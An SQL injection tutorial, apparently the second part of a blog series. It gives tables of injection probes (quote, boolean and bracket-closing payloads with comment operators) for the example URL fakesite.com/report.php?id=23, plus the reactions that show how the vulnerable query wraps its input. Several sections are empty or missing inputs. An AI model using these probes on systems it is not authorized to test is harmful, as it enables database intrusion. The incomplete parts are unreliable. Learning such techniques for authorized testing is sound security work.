Welcome to the second part of basics of SQL for SQL injection. We took this url “http://fakesite.com/report.php?id=23” as an example and then assumed some basic queries by looking at the URL. Our queries were:

You may also encounter your input under the columns or group/order by statements but they are not common, so we will discuss them later on. Now lets continue to next step how to test with different input and know which of the above query are we dealing with.

before we start we must know different types of comments used in SQLi.

Comment Name
: MySQL Linux Style
–+ : MySQL Windows Style
# : Hash (URL encode while use)
–+- : SQL Comment
;%00 : Null Byte
` : Backtick

So now lets start with out next phase. All what we need to do is input different injections and see how Application acts on it.


Information Remember whenever the input is enclosed with single quotes only single quote with input will create error.
When input is enlcosed by double quotes a double qoute with input will give error.
When Input is not enlcosed with anything single quote and double quote both will give error.

First of all we can try our input with some injections to see if we get any error. Error may always not be real SQL error it may be some times generic error or change in output of the application. All you have to do it recognise it.

MySQL Error Style:

MSSQL ASPX Error:

MSAccess (Apache PHP):

MSAccesss (IIS ASP):

Oracle Error:

ODBC Error:

PostgreSQL Error:

MS SQL Server: Error:

Now i will show you different tests to create errors and confirm which query is working inside the Application while using the same example “http://fakesite.com/report.php?id=23” url, You can perform these tests and check the reactions of the application:

Input Reaction if its Intiger Based Injection
23′ : It should cause error or no output
: Should cause error or no output
23 or 1=1 : Any Output should come but may be different output
23 and 1=1 : Same output should come
23 and false : No output
23 and true : Same Output
23–+ : Same output. I used –+ to comment, later i ll show how to know which one to use
23 and true–+ : Same output

If the Web application reacts same as shown above then you can make sure that the injection is intiger type. Now lets test for single quote enclosed input query.

Input Reaction if its Single Qoute Based Injection
23′ : It should cause error or no output
23″ : No error Same output
23′ or ‘1’=’1 : Any Output should come but may be different output
23′ and ‘1’=’1 : Same output should come
23′ and false–+ : No output
23′ and true–+ : Same Output

If the Web application reacts same as shown above then you can make sure that the injection is single quote type. Now lets test for double quote enclosed input query.

 

Input Reaction if its Double Qoute Based Injection
23′ : No error Same output
23″ : >It should cause error or no output
23″ or “1”=”1 : Any Output should come but may be different output
23″ and “1”=”1 : Same output should come
23″ and false–+ : No output
23″ and true–+ : Same Output

If the Web application reacts same as shown above then you can make sure that the injection is Double quote type. Now lets test for bracket enclosed initger based input query.

 

Input Reaction if its Intiger Based Bracket enclosed Injection
23′ : It should cause error or no output
: Should cause error or no output
23 or 1=1 : Output should come but may be different output
23 and 1=1 : Output should come but may be different output
23 and false : No output
23 and true : Same Output
23–+ : Error or No output. Here you can understand that any Bracket is used
23)–+ : Same output
23) and false–+ : No output
23) and true–+ : Same output

If the Web application reacts same as shown above then you can make sure that the injection is Intiger type with bracket Query. Now lets test for bracket enclosed Single Quote based input query.

 

Input Reaction if its bracket enclosed Single Quote based Injection
23′ : It should cause error or no output
23″ : No error Same output
23′ or ‘1’=’1 : Any Output should come but may be different output
23′ and ‘1’=’1 : Any Output should come but may be different output
23′ and false–+ : No output or error
23′ and true–+ : No output or error
23′) and False–+ : No output
23′) and true–+ : Same Output
23′) or true–+ : Output will come but may be different

If the Web application reacts same as shown above then you can make sure that the injection is bracket enclosed Single Quote based input query. Now lets test for bracket enclosed double Quote based input query.

 

Input Reaction if its bracket enclosed Double Quote based Injection
23′ : No error Same output
23″ : Error or No output
23″ or “1”=”1 : Any Output should come but may be different output
23″ and “1”=”1 : Any Output should come but may be different output
23″ and false–+ : No output or error
23″ and true–+ : No output or error
23″) and False–+ : No output
23″) and true–+ : Same Output
23″) or true–+ : Output will come but may be different

If the Web application reacts same as shown above then you can make sure that the injection is bracket enclosed double Quote based input query.

So here we just learn to check which query is working inside the application, in the next tutorial we will learn two things how to use the right comment operator and how and why to find the number of columns.

What Do You Think on This ? Say Here